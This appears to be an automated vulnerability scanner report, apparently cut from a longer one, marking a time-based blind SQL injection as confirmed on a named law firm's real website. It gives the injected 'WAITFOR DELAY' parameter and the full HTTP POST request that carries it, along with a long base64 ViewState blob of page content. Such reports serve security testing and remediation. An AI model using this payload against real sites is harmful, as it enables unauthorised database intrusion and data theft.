suZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD4NClUuUy4gQ291cnQgb2YgQXBwZWFscywgRmlyc3QgQ2lyY3VpdCBcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBDb3VydCBvZiBBcHBlYWxzLCBTZWNvbmQgQ2lyY3VpdCBcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBDb3VydCBvZiBBcHBlYWxzLCBUaGlyZCBDaXJjdWl0IFw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpVLlMuIENvdXJ0IG9mIEFwcGVhbHMsIEZvdXJ0aCBDaXJjdWl0IFw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpVLlMuIENvdXJ0IG9mIEFwcGVhbHMsIFNldmVudGggQ2lyY3VpdCBcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPg0KVS5TLiBDb3VydCBvZiBBcHBlYWxzLCBFbGV2ZW50aCBDaXJjdWl0IFw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpVLlMuIERpc3RyaWN0IENvdXJ0cywgU291dGhlcm4gYW5kIEVhc3Rlcm4gRGlzdHJpY3RzIG9mIE5ldyBZb3JrIFw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpVLlMuIERpc3RyaWN0IENvdXJ0LCBEaXN0cmljdCBvZiBNYXNzYWNodXNldHRzOz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8ZGl2IHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5cPEJSXD5NRU1CRVJTSElQUyBBTkQgUFJPRkVTU0lPTkFMIEFDVElWSVRJRVNcPEJSXD5cPEJSXD5cPC9CXD5cPC9kaXZcPkFtZXJpY2FuIENvbGxlZ2Ugb2YgVHJpYWwgTGF3eWVycywgRmVsbG93XDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2JsbmsuZ2lmIiBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIHZzcGFjZT0zXD5cPGJyXD4NCkFtZXJpY2FuIEJhciBBc3NvY2lhdGlvbi..
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=1;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
show GET 1;WAITFOR DELAY '0:0:25'--
__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Request

POST /new/showlocationnew.aspx?show=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEA